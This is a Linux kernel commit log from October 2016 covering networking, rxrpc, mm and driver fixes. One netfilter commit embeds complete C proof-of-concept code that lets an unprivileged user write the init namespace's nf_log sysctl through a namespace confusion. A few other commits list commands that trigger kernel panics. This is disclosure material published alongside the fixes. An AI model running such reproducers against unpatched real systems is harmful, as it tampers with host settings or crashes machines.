linux - linux

	Commit message (Collapse)	Author	Files	Lines
2016-10-06	rxrpc: Fix loss of PING RESPONSE ACK production due to PING ACKs	David Howells	8	-29/+82
	Separate the output of PING ACKs from the output of other sorts of ACK so that if we receive a PING ACK and schedule transmission of a PING RESPONSE ACK, the response doesn't get cancelled by a PING ACK we happen to be scheduling transmission of at the same time. If a PING RESPONSE gets lost, the other side might just sit there waiting for it and refuse to proceed otherwise. Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06	rxrpc: Fix warning by splitting rxrpc_send_call_packet()	David Howells	8	-84/+102
	Split rxrpc_send_data_packet() to separate ACK generation (which is more complicated) from ABORT generation. This simplifies the code a bit and fixes the following warning: In file included from ../net/rxrpc/output.c:20:0: net/rxrpc/output.c: In function 'rxrpc_send_call_packet': net/rxrpc/ar-internal.h:1187:27: error: 'top' may be used uninitialized in this function [-Werror=maybe-uninitialized] net/rxrpc/output.c:103:24: note: 'top' was declared here net/rxrpc/output.c:225:25: error: 'hard_ack' may be used uninitialized in this function [-Werror=maybe-uninitialized] Reported-by: Arnd Bergmann <arnd@arndb.de> Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06	rxrpc: Only ping for lost reply in client call	David Howells	1	-1/+2
	When a reply is deemed lost, we send a ping to find out the other end received all the request data packets we sent. This should be limited to client calls and we shouldn't do this on service calls. Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06	rxrpc: Fix oops on incoming call to serviceless endpoint	David Howells	1	-1/+1
	If an call comes in to a local endpoint that isn't listening for any incoming calls at the moment, an oops will happen. We need to check that the local endpoint's service pointer isn't NULL before we dereference it. Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06	rxrpc: Fix duplicate const	David Howells	2	-2/+2
	Remove a duplicate const keyword. Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06	rxrpc: Accesses of rxrpc_local::service need to be RCU managed	David Howells	1	-2/+2
	struct rxrpc_local->service is marked __rcu - this means that accesses of it need to be managed using RCU wrappers. There are two such places in rxrpc_release_sock() where the value is checked and cleared. Fix this by using the appropriate wrappers. Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06	phy: micrel.c: Enable ksz9031 energy-detect power-down mode	Mike Looijmans	1	-0/+21
	Set bit 0 in register 1C.23 to enable the EDPD feature of the KSZ9031 PHY. This reduces power consumption when the link is down. Signed-off-by: Mike Looijmans <mike.looijmans@topic.nl> Reviewed-by: Andrew Lunn <andrew@lunn.ch> Reviewed-by: Florian Fainelli <f.fainelli@gmail.com Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-06	netfilter: merge fixup for "nf_tables_netdev: remove redundant ip_hdr ↵	Stephen Rothwell	1	-1/+0
	assignment" Signed-off-by: Stephen Rothwell <sfr@canb.auug.org.au> Acked-by: Pablo Neira Ayuso <pablo@netfilter.org> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-05	mm: filemap: fix mapping->nrpages double accounting in fuse	Johannes Weiner	1	-1/+0
	Commit 22f2ac51b6d6 ("mm: workingset: fix crash in shadow node shrinker caused by replace_page_cache_page()") switched replace_page_cache() from raw radix tree operations to page_cache_tree_insert() but didn't take into account that the latter function, unlike the raw radix tree op, handles mapping->nrpages. As a result, that counter is bumped for each page replacement rather than balanced out even. The mapping->nrpages counter is used to skip needless radix tree walks when invalidating, truncating, syncing inodes without pages, as well as statistics for userspace. Since the error is positive, we'll do more page cache tree walks than necessary; we won't miss a necessary one. And we'll report more buffer pages to userspace than there are. The error is limited to fuse inodes. Fixes: 22f2ac51b6d6 ("mm: workingset: fix crash in shadow node shrinker caused by replace_page_cache_page()") Signed-off-by: Johannes Weiner <hannes@cmpxchg.org> Cc: Andrew Morton <akpm@linux-foundation.org> Cc: Miklos Szeredi <miklos@szeredi.hu> Cc: stable@vger.kernel.org Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2016-10-05	mm: filemap: don't plant shadow entries without radix tree node	Johannes Weiner	3	-30/+36
	When the underflow checks were added to workingset_node_shadow_dec(), they triggered immediately: kernel BUG at ./include/linux/swap.h:276! invalid opcode: 0000 [#1] SMP Modules linked in: isofs usb_storage fuse xt_CHECKSUM ipt_MASQUERADE nf_nat_masquerade_ipv4 tun nf_conntrack_netbios_ns nf_conntrack_broadcast ip6t_REJECT nf_reject_ipv6 soundcore wmi acpi_als pinctrl_sunrisepoint kfifo_buf tpm_tis industrialio acpi_pad pinctrl_intel tpm_tis_core tpm nfsd auth_rpcgss nfs_acl lockd grace sunrpc dm_crypt CPU: 0 PID: 20929 Comm: blkid Not tainted 4.8.0-rc8-00087-gbe67d60ba944 #1 Hardware name: System manufacturer System Product Name/Z170-K, BIOS 1803 05/06/2016 task: ffff8faa93ecd940 task.stack: ffff8faa7f478000 RIP: page_cache_tree_insert+0xf1/0x100 Call Trace: __add_to_page_cache_locked+0x12e/0x270 add_to_page_cache_lru+0x4e/0xe0 mpage_readpages+0x112/0x1d0 blkdev_readpages+0x1d/0x20 __do_page_cache_readahead+0x1ad/0x290 force_page_cache_readahead+0xaa/0x100 page_cache_sync_readahead+0x3f/0x50 generic_file_read_iter+0x5af/0x740 blkdev_read_iter+0x35/0x40 __vfs_read+0xe1/0x130 vfs_read+0x96/0x130 SyS_read+0x55/0xc0 entry_SYSCALL_64_fastpath+0x13/0x8f Code: 03 00 48 8b 5d d8 65 48 33 1c 25 28 00 00 00 44 89 e8 75 19 48 83 c4 18 5b 41 5c 41 5d 41 5e 5d c3 0f 0b 41 bd ef ff ff ff eb d7 <0f> 0b e8 88 68 ef ff 0f 1f 84 00 RIP page_cache_tree_insert+0xf1/0x100 This is a long-standing bug in the way shadow entries are accounted in the radix tree nodes. The shrinker needs to know when radix tree nodes contain only shadow entries, no pages, so node->count is split in half to count shadows in the upper bits and pages in the lower bits. Unfortunately, the radix tree implementation doesn't know of this and assumes all entries are in node->count. When there is a shadow entry directly in root->rnode and the tree is later extended, the radix tree implementation will copy that entry into the new node and and bump its node->count, i.e. increases the page count bits. Once the shadow gets removed and we subtract from the upper counter, node->count underflows and triggers the warning. Afterwards, without node->count reaching 0 again, the radix tree node is leaked. Limit shadow entries to when we have actual radix tree nodes and can count them properly. That means we lose the ability to detect refaults from files that had only the first page faulted in at eviction time. Fixes: 449dd6984d0e ("mm: keep page cache radix tree nodes in check") Signed-off-by: Johannes Weiner <hannes@cmpxchg.org> Reported-and-tested-by: Linus Torvalds <torvalds@linux-foundation.org> Reviewed-by: Jan Kara <jack@suse.cz> Cc: Andrew Morton <akpm@linux-foundation.org> Cc: stable@vger.kernel.org Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2016-10-05	DT: irqchip: renesas-irqc: document R8A7743/5 support	Sergei Shtylyov	1	-1/+3
	Renesas RZ/G SoC have the R-Car gen2 compatible IRQC interrupt controllers. Document RZ/G1[ME] (also known as R8A774[35]) SoC bindings. Signed-off-by: Sergei Shtylyov <sergei.shtylyov@cogentembedded.com> Acked-by: Geert Uytterhoeven <geert+renesas@glider.be> Signed-off-by: Rob Herring <robh@kernel.org>
2016-10-05	dt-bindings: Add Keith&Koep vendor prefix	Marek Vasut	1	-0/+1
	Add vendor prefix for Keith&Koep GmbH , http://keith-koep.com/en/ Signed-off-by: Marek Vasut <marex@denx.de> Cc: Fabio Estevam <fabio.estevam@nxp.com> Cc: Shawn Guo <shawnguo@kernel.org> [robh: fix alphabetizing] Signed-off-by: Rob Herring <robh@kernel.org>
2016-10-05	mlxsw: switchx2: Fix misuse of hard_header_len	Yotam Gigi	1	-1/+1
	In order to specify that the mlxsw switchx2 driver needs additional headroom for packets, there have been use of the hard_header_len field of the netdevice struct. This commit changes that to use needed_headroom instead, as this is the correct way to do that. Fixes: 31557f0f9755 ("mlxsw: Introduce Mellanox SwitchX-2 ASIC support") Signed-off-by: Yotam Gigi <yotamg@mellanox.com> Acked-by: Ido Schimmel <idosch@mellanox.com> Signed-off-by: Jiri Pirko <jiri@mellanox.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-05	mlxsw: spectrum: Fix misuse of hard_header_len	Yotam Gigi	1	-1/+1
	In order to specify that the mlxsw spectrum driver needs additional headroom for packets, there have been use of the hard_header_len field of the netdevice struct. This commit changes that to use needed_headroom instead, as this is the correct way to do that. Fixes: 56ade8fe3fe1 ("mlxsw: spectrum: Add initial support for Spectrum ASIC") Signed-off-by: Yotam Gigi <yotamg@mellanox.com> Acked-by: Ido Schimmel <idosch@mellanox.com> Signed-off-by: Jiri Pirko <jiri@mellanox.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04	dt-bindings: add vendor prefix for Auvidea GmbH	Lucas Stach	1	-0/+1
	Auvidea (http://www.auvidea.eu/) produces embedded devices and baseboards with a focus on audio and video technology. Signed-off-by: Lucas Stach <l.stach@pengutronix.de> Signed-off-by: Rob Herring <robh@kernel.org>
2016-10-04	netfilter: nft_limit: fix divided by zero panic	Liping Zhang	1	-2/+2
	After I input the following nftables rule, a panic happened on my system: # nft add rule filter OUTPUT limit rate 0xf00000000 bytes/second divide error: 0000 [#1] SMP [ ... ] RIP: 0010:[<ffffffffa059035e>] [<ffffffffa059035e>] nft_limit_pkt_bytes_eval+0x2e/0xa0 [nft_limit] Call Trace: [<ffffffffa05721bb>] nft_do_chain+0xfb/0x4e0 [nf_tables] [<ffffffffa044f236>] ? nf_nat_setup_info+0x96/0x480 [nf_nat] [<ffffffff81753767>] ? ipt_do_table+0x327/0x610 [<ffffffffa044f677>] ? __nf_nat_alloc_null_binding+0x57/0x80 [nf_nat] [<ffffffffa058b21f>] nft_ipv4_output+0xaf/0xd0 [nf_tables_ipv4] [<ffffffff816f4aa2>] nf_iterate+0x62/0x80 [<ffffffff816f4b33>] nf_hook_slow+0x73/0xd0 [<ffffffff81703d0d>] __ip_local_out+0xcd/0xe0 [<ffffffff81701d90>] ? ip_forward_options+0x1b0/0x1b0 [<ffffffff81703d3c>] ip_local_out+0x1c/0x40 This is because divisor is 64-bit, but we treat it as a 32-bit integer, then 0xf00000000 becomes zero, i.e. divisor becomes 0. Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-04	netfilter: fix namespace handling in nf_log_proc_dostring	Jann Horn	1	-2/+4
	nf_log_proc_dostring() used current's network namespace instead of the one corresponding to the sysctl file the write was performed on. Because the permission check happens at open time and the nf_log files in namespaces are accessible for the namespace owner, this can be abused by an unprivileged user to effectively write to the init namespace's nf_log sysctls. Stash the "struct net " in extra2 - data and extra1 are already used. Repro code: #define _GNU_SOURCE #include <stdlib.h> #include <sched.h> #include <err.h> #include <sys/mount.h> #include <sys/types.h> #include <sys/wait.h> #include <fcntl.h> #include <unistd.h> #include <string.h> #include <stdio.h> char child_stack[1000000]; uid_t outer_uid; gid_t outer_gid; int stolen_fd = -1; void writefile(char path, char buf) { int fd = open(path, O_WRONLY); if (fd == -1) err(1, "unable to open thing"); if (write(fd, buf, strlen(buf)) != strlen(buf)) err(1, "unable to write thing"); close(fd); } int child_fn(void p_) { if (mount("proc", "/proc", "proc", MS_NOSUID\|MS_NODEV\|MS_NOEXEC, NULL)) err(1, "mount"); /* Yes, we need to set the maps for the net sysctls to recognize us * as namespace root. / char buf[1000]; sprintf(buf, "0 %d 1\n", (int)outer_uid); writefile("/proc/1/uid_map", buf); writefile("/proc/1/setgroups", "deny"); sprintf(buf, "0 %d 1\n", (int)outer_gid); writefile("/proc/1/gid_map", buf); stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY); if (stolen_fd == -1) err(1, "open nf_log"); return 0; } int main(void) { outer_uid = getuid(); outer_gid = getgid(); int child = clone(child_fn, child_stack + sizeof(child_stack), CLONE_FILES\|CLONE_NEWNET\|CLONE_NEWNS\|CLONE_NEWPID \|CLONE_NEWUSER\|CLONE_VM\|SIGCHLD, NULL); if (child == -1) err(1, "clone"); int status; if (wait(&status) != child) err(1, "wait"); if (!WIFEXITED(status) \|\| WEXITSTATUS(status) != 0) errx(1, "child exit status bad"); char data = "NONE"; if (write(stolen_fd, data, strlen(data)) != strlen(data)) err(1, "write"); return 0; } Repro: $ gcc -Wall -o attack attack.c -std=gnu99 $ cat /proc/sys/net/netfilter/nf_log/2 nf_log_ipv4 $ ./attack $ cat /proc/sys/net/netfilter/nf_log/2 NONE Because this looks like an issue with very low severity, I'm sending it to the public list directly. Signed-off-by: Jann Horn <jann@thejh.net> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-04	net/faraday: Stop NCSI device on shutdown	Gavin Shan	1	-0/+2
	This stops NCSI device when closing the network device so that the NCSI device can be reenabled later. Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com> Reviewed-by: Joel Stanley <joel@jms.id.au> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04	net/ncsi: Introduce ncsi_stop_dev()	Gavin Shan	2	-13/+29
	This introduces ncsi_stop_dev(), as counterpart to ncsi_start_dev(), to stop the NCSI device so that it can be reenabled in future. This API should be called when the network device driver is going to shutdown the device. There are 3 things done in the function: Stop the channel monitoring; Reset channels to inactive state; Report NCSI link down. Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com> Reviewed-by: Joel Stanley <joel@jms.id.au> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04	net/ncsi: Rework the channel monitoring	Gavin Shan	3	-23/+35
	The original NCSI channel monitoring was implemented based on a backoff algorithm: the GLS response should be received in the specified interval. Otherwise, the channel is regarded as dead and failover should be taken if current channel is an active one. There are several problems in the implementation: (A) On BCM5718, we found when the IID (Instance ID) in the GLS command packet changes from 255 to 1, the response corresponding to IID#1 never comes in. It means we cannot make the unfair judgement that the channel is dead when one response is missed. (B) The code's readability should be improved. (C) We should do failover when current channel is active one and the channel monitoring should be marked as disabled before doing failover. This reworks the channel monitoring to address all above issues. The fields for channel monitoring is put into separate struct and the state of channel monitoring is predefined. The channel is regarded alive if the network controller responses to one of two GLS commands or both of them in 5 seconds. Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com> Reviewed-by: Joel Stanley <joel@jms.id.au> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04	net/ncsi: Allow to extend NCSI request properties	Gavin Shan	4	-14/+17
	There is only one NCSI request property for now: the response for the sent command need drive the workqueue or not. So we had one field (@driven) for the purpose. We lost the flexibility to extend NCSI request properties. This replaces @driven with @flags and @req_flags in NCSI request and NCSI command argument struct. Each bit of the newly introduced field can be used for one property. No functional changes introduced. Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com> Reviewed-by: Joel Stanley <joel@jms.id.au> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04	net/ncsi: Rework request index allocation	Gavin Shan	2	-8/+10
	The NCSI request index (struct ncsi_request::id) is put into instance ID (IID) field while sending NCSI command packet. It was designed the available IDs are given in round-robin fashion. @ndp->request_id was introduced to represent the next available ID, but it has been used as number of successively allocated IDs. It breaks the round-robin design. Besides, we shouldn't put 0 to NCSI command packet's IID field, meaning ID#0 should be reserved according section 6.3.1.1 in NCSI spec (v1.1.0). This fixes above two issues. With it applied, the available IDs will be assigned in round-robin fashion and ID#0 won't be assigned. Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com> Reviewed-by: Joel Stanley <joel@jms.id.au> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04	net/ncsi: Don't probe on the reserved channel ID (0x1f)	Gavin Shan	1	-2/+2
	We needn't send CIS (Clear Initial State) command to the NCSI reserved channel (0x1f) in the enumeration. We shouldn't receive a valid response from CIS on NCSI channel 0x1f. Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com> Reviewed-by: Joel Stanley <joel@jms.id.au> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04	net/ncsi: Introduce NCSI_RESERVED_CHANNEL	Gavin Shan	2	-7/+8
	This defines NCSI_RESERVED_CHANNEL as the reserved NCSI channel ID (0x1f). No logical changes introduced. Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com> Reviewed-by: Joel Stanley <joel@jms.id.au> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04	net/ncsi: Avoid unused-value build warning from ia64-linux-gcc	Gavin Shan	2	-27/+81
	xchg() is used to set NCSI channel's state in order for consistent access to the state. xchg()'s return value should be used. Otherwise, one build warning will be raised (with -Wunused-value) as below message indicates. It is reported by ia64-linux-gcc (GCC) 4.9.0. net/ncsi/ncsi-manage.c: In function 'ncsi_channel_monitor': arch/ia64/include/uapi/asm/cmpxchg.h:56:2: warning: value computed is \ not used [-Wunused-value] ((__typeof__((ptr))) __xchg((unsigned long) (x), (ptr), sizeof((ptr)))) ^ net/ncsi/ncsi-manage.c:202:3: note: in expansion of macro 'xchg' xchg(&nc->state, NCSI_CHANNEL_INACTIVE); This removes the atomic access to NCSI channel's state avoid the above build warning. We have to hold the channel's lock when its state is readed or updated. No functional changes introduced. Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com> Reviewed-by: Joel Stanley <joel@jms.id.au> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04	net: Add netdev all_adj_list refcnt propagation to fix panic	Andrew Collins	1	-31/+37
	This is a respin of a patch to fix a relatively easily reproducible kernel panic related to the all_adj_list handling for netdevs in recent kernels. The following sequence of commands will reproduce the issue: ip link add link eth0 name eth0.100 type vlan id 100 ip link add link eth0 name eth0.200 type vlan id 200 ip link add name testbr type bridge ip link set eth0.100 master testbr ip link set eth0.200 master testbr ip link add link testbr mac0 type macvlan ip link delete dev testbr This creates an upper/lower tree of (excuse the poor ASCII art): /---eth0.100-eth0 mac0-testbr- \---eth0.200-eth0 When testbr is deleted, the all_adj_lists are walked, and eth0 is deleted twice from the mac0 list. Unfortunately, during setup in __netdev_upper_dev_link, only one reference to eth0 is added, so this results in a panic. This change adds reference count propagation so things are handled properly. Matthias Schiffer reported a similar crash in batman-adv: https://github.com/freifunk-gluon/gluon/issues/680 https://www.open-mesh.org/issues/247 which this patch also seems to resolve. Signed-off-by: Andrew Collins <acollins@cradlepoint.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04	net: phy: Add Edge-rate driver for Microsemi PHYs.	Raju Lakkaraju	3	-0/+204
	Edge-rate: As system and networking speeds increase, a signal's output transition, also know as the edge rate or slew rate (V/ns), takes on greater importance because high-speed signals come with a price. That price is an assortment of interference problems like ringing on the line, signal overshoot and undershoot, extended signal settling times, crosstalk noise, transmission line reflections, false signal detection by the receiving device and electromagnetic interference (EMI) -- all of which can negate the potential gains designers are seeking when they try to increase system speeds through the use of higher performance logic devices. The fact is, faster signaling edge rates can cause a higher level of electrical noise or other type of interference that can actually lead to slower line speeds and lower maximum system frequencies. This parameter allow the board designers to change the driving strange, and thereby change the EMI behavioral. Edge-rate parameters (vddmac, edge-slowdown) get from Device Tree. Tested on Beaglebone Black with VSC 8531 PHY. Signed-off-by: Raju Lakkaraju <Raju.Lakkaraju@microsemi.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04	vmxnet3: Wake queue from reset work	Benjamin Poirier	1	-1/+1
	vmxnet3_reset_work() expects tx queues to be stopped (via vmxnet3_quiesce_dev -> netif_tx_disable). However, this races with the netif_wake_queue() call in netif_tx_timeout() such that the driver's start_xmit routine may be called unexpectedly, triggering one of the BUG_ON in vmxnet3_map_pkt with a stack trace like this: RIP: 0010:[<ffffffffa00cf4bc>] vmxnet3_map_pkt+0x3ac/0x4c0 [vmxnet3] [<ffffffffa00cf7e0>] vmxnet3_tq_xmit+0x210/0x4e0 [vmxnet3] [<ffffffff813ab144>] dev_hard_start_xmit+0x2e4/0x4c0 [<ffffffff813c956e>] sch_direct_xmit+0x17e/0x1e0 [<ffffffff813c96a7>] __qdisc_run+0xd7/0x130 [<ffffffff813a6a7a>] net_tx_action+0x10a/0x200 [<ffffffff810691df>] __do_softirq+0x11f/0x260 [<ffffffff81472fdc>] call_softirq+0x1c/0x30 [<ffffffff81004695>] do_softirq+0x65/0xa0 [<ffffffff81069b89>] local_bh_enable_ip+0x99/0xa0 [<ffffffffa031ff36>] destroy_conntrack+0x96/0x110 [nf_conntrack] [<ffffffff813d65e2>] nf_conntrack_destroy+0x12/0x20 [<ffffffff8139c6d5>] skb_release_head_state+0xb5/0xf0 [<ffffffff8139d299>] skb_release_all+0x9/0x20 [<ffffffff8139cfe9>] __kfree_skb+0x9/0x90 [<ffffffffa00d0069>] vmxnet3_quiesce_dev+0x209/0x340 [vmxnet3] [<ffffffffa00d020a>] vmxnet3_reset_work+0x6a/0xa0 [vmxnet3] [<ffffffff8107d7cc>] process_one_work+0x16c/0x350 [<ffffffff810804fa>] worker_thread+0x17a/0x410 [<ffffffff810848c6>] kthread+0x96/0xa0 [<ffffffff81472ee4>] kernel_thread_helper+0x4/0x10 Signed-off-by: Benjamin Poirier <bpoirier@suse.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04	Using BUG_ON() as an assert() is _never_ acceptable	Linus Torvalds	1	-2/+2
	That just generally kills the machine, and makes debugging only much harder, since the traces may long be gone. Debugging by assert() is a disease. Don't do it. If you can continue, you're much better off doing so with a live machine where you have a much higher chance that the report actually makes it to the system logs, rather than result in a machine that is just completely dead. The only valid situation for BUG_ON() is when continuing is not an option, because there is massive corruption. But if you are just verifying that something is true, you warn about your broken assumptions (preferably just once), and limp on. Fixes: 22f2ac51b6d6 ("mm: workingset: fix crash in shadow node shrinker caused by replace_page_cache_page()") Cc: Johannes Weiner <hannes@cmpxchg.org> Cc: Miklos Szeredi <miklos@szeredi.hu> Cc: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2016-10-04	i40e: avoid NULL pointer dereference and recursive errors on early PCI error	Guilherme G Piccoli	1	-0/+6
	Although rare, it's possible to hit PCI error early on device probe, meaning possibly some structs are not entirely initialized, and some might even be completely uninitialized, leading to NULL pointer dereference. The i40e driver currently presents a "bad" behavior if device hits such early PCI error: firstly, the struct i40e_pf might not be attached to pci_dev yet, leading to a NULL pointer dereference on access to pf->state. Even checking if the struct is NULL and avoiding the access in that case isn't enough, since the driver cannot recover from PCI error that early; in our experiments we saw multiple failures on kernel log, like: [549.664] i40e 0007:01:00.1: Initial pf_reset failed: -15 [549.664] i40e: probe of 0007:01:00.1 failed with error -15 [...] [871.644] i40e 0007:01:00.1: The driver for the device stopped because the device firmware failed to init. Try updating your NVM image. [871.644] i40e: probe of 0007:01:00.1 failed with error -32 [...] [872.516] i40e 0007:01:00.0: ARQ: Unknown event 0x0000 ignored Between the first probe failure (error -15) and the second (error -32) another PCI error happened due to the first bad probe. Also, driver started to flood console with those ARQ event messages. This patch will prevent these issues by allowing error recovery mechanism to remove the failed device from the system instead of trying to recover from early PCI errors during device probe. CC: <stable@vger.kernel.org> Signed-off-by: Guilherme G Piccoli <gpiccoli@linux.vnet.ibm.com> Acked-by: Jacob Keller <jacob.e.keller@intel.com> Tested-by: Andrew Bowers <andrewx.bowers@intel.com> Signed-off-by: Jeff Kirsher <jeffrey.t.kirsher@intel.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04	qed: Add RoCE ll2 & GSI support	Ram Amrani	7	-12/+523
	Add the RoCE-specific LL2 logic [as well as GSI support] over the 'generic' LL2 interface. Signed-off-by: Ram Amrani <Ram.Amrani@caviumnetworks.com> Signed-off-by: Yuval Mintz <Yuval.Mintz@caviumnetworks.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04	qed: Add support for memory registeration verbs	Ram Amrani	2	-0/+246
	Add slowpath configuration support for user, dma and memory regions registration. Signed-off-by: Ram Amrani <Ram.Amrani@caviumnetworks.com> Signed-off-by: Yuval Mintz <Yuval.Mintz@caviumnetworks.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04	qed: Add support for QP verbs	Ram Amrani	4	-0/+1413
	Add support for the slowpath configurations of Queue Pair verbs which adds, deletes, modifies and queries Queue Pairs. Signed-off-by: Ram Amrani <Ram.Amrani@caviumnetworks.com> Signed-off-by: Yuval Mintz <Yuval.Mintz@caviumnetworks.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04	qed: PD,PKEY and CQ verb support	Ram Amrani	3	-0/+375
	Add support for the configurations of the protection domain and completion queues. Signed-off-by: Ram Amrani <Ram.Amrani@caviumnetworks.com> Signed-off-by: Yuval Mintz <Yuval.Mintz@caviumnetworks.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04	qed: Add support for RoCE hw init	Ram Amrani	17	-8/+1620
	This adds the backbone required for the various HW initalizations which are necessary for the qedr driver - FW notification, resource initializations, etc. Signed-off-by: Ram Amrani <Ram.Amrani@caviumnetworks.com> Signed-off-by: Yuval Mintz <Yuval.Mintz@caviumnetworks.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04	qede: Add qedr framework	Ram Amrani	7	-17/+451
	Adds a skeletal implementation of the qede RoCE driver - The qedr has some dependencies of the state of the underlying base interface. This adds some logic required with mutual registrations and the ability to pass updates on 'intresting' events. Signed-off-by: Ram Amrani <Ram.Amrani@caviumnetworks.com> Signed-off-by: Yuval Mintz <Yuval.Mintz@caviumnetworks.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04	qed: Add Light L2 support	Yuval Mintz	13	-3/+2334
	Other protocols beside the networking driver need the ability of passing some L2 traffic, usually [although not limited] for the purpose of some management traffic. Signed-off-by: Yuval Mintz <Yuval.Mintz@caviumnetworks.com> Signed-off-by: Ram Amrani <Ram.Amrani@caviumnetworks.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04	i40e: fix sideband flow director vector allocation	Stefan Assmann	1	-2/+9
	Currently if the MSI-X vector limit is reached the sideband flow director gets disabled. A bit too early to make that decision, as vectors may get re-distributed. So move the check further back. Signed-off-by: Stefan Assmann <sassmann@kpanic.de> Tested-by: Andrew Bowers <andrewx.bowers@intel.com> Signed-off-by: Jeff Kirsher <jeffrey.t.kirsher@intel.com>
2016-10-04	i40e: fix MSI-X vector redistribution if hw limit is reached	Stefan Assmann	1	-16/+22
	The driver allocates 1 vector per CPU thread and the current hardware limit for vectors is 129 per PF. On systems with 128 or more threads this currently means all vectors are used by the PF leaving no room for additional features like VMDq, iWARP, etc... The code that should redistribute the vectors in this case is broken and never triggers. Fixed the code so that it actually triggers if the hardware limit is reached and adjust the number of queue pairs accordingly. Also the number of initially requested iWARP vectors was not properly saved when the vector limit was reached, and therefore always zero. Comparison with debug statement. Before: i40e 0000:2d:00.0: VMDq disabled, not enough MSI-X vectors i40e 0000:2d:00.0: IWARP disabled, not enough MSI-X vectors i40e 00.0 MSI-X vector distribution: PF 128, VMDq 0, FDSB 0, iWARP 0 After: i40e 0000:2d:00.0: MSI-X vector limit reached, attempting to redistribute vectors i40e 00.0 MSI-X vector distribution: PF 78, VMDq 8, FDSB 0, iWARP 42 Signed-off-by: Stefan Assmann <sassmann@kpanic.de> Tested-by: Andrew Bowers <andrewx.bowers@intel.com> Signed-off-by: Jeff Kirsher <jeffrey.t.kirsher@intel.com>
2016-10-04	i40e: check if vectors are already depleted when doing VMDq allocation	Stefan Assmann	1	-11/+16
	During MSI-X vector allocation for VMDq, a check for "no vectors left" was missing, add it. This prevents more vectors to be allocated than available. Signed-off-by: Stefan Assmann <sassmann@kpanic.de> Tested-by: Andrew Bowers <andrewx.bowers@intel.com> Signed-off-by: Jeff Kirsher <jeffrey.t.kirsher@intel.com>
2016-10-04	ptp: Fix resource leak in case of error	Christophe Jaillet	1	-0/+1
	A call to 'ida_simple_remove()' is missing in the error handling path. This as been spotted with the following coccinelle script which tries to detect missing 'ida_simple_remove()' call in error handling paths. /////////////// @@ expression x; identifier l; @@ * x = ida_simple_get(...); ... if (...) { ... } ... if (...) { ... goto l; } ... * l: ... when != ida_simple_remove(...); Signed-off-by: Christophe JAILLET <christophe.jaillet@wanadoo.fr> Acked-by: Richard Cochran <richardcochran@gmail.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04	net: qcom/emac: fix return value check in emac_sgmii_config()	Wei Yongjun	1	-4/+9
	In case of error, the function ioremap() returns NULL pointer not ERR_PTR(). The IS_ERR() test in the return value check should be replaced with NULL test. Also add check for return value of platform_get_resource(). Fixes: 54e19bc74f33 ("net: qcom/emac: do not use devm on internal phy pdev") Signed-off-by: Wei Yongjun <weiyongjun1@huawei.com> Acked-by: Timur Tabi <timur@codeaurora.org> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04	net: skbuff: Limit skb_vlan_pop/push() to expect skb->data at mac header	Shmulik Ladkani	1	-15/+22
	skb_vlan_pop/push were too generic, trying to support the cases where skb->data is at mac header, and cases where skb->data is arbitrarily elsewhere. Supporting an arbitrary skb->data was complex and bogus: - It failed to unwind skb->data to its original location post actual pop/push. (Also, semantic is not well defined for unwinding: If data was into the eth header, need to use same offset from start; But if data was at network header or beyond, need to adjust the original offset according to the push/pull) - It mangled the rcsum post actual push/pop, without taking into account that the eth bytes might already have been pulled out of the csum. Most callers (ovs, bpf) already had their skb->data at mac_header upon invoking skb_vlan_pop/push. Last caller that failed to do so (act_vlan) has been recently fixed. Therefore, to simplify things, no longer support arbitrary skb->data inputs for skb_vlan_pop/push(). skb->data is expected to be exactly at mac_header; WARN otherwise. Signed-off-by: Shmulik Ladkani <shmulik.ladkani@gmail.com> Cc: Daniel Borkmann <daniel@iogearbox.net> Cc: Pravin Shelar <pshelar@ovn.org> Cc: Jiri Pirko <jiri@mellanox.com> Signed-off-by: David S. Miller <davem@davemloft.net>
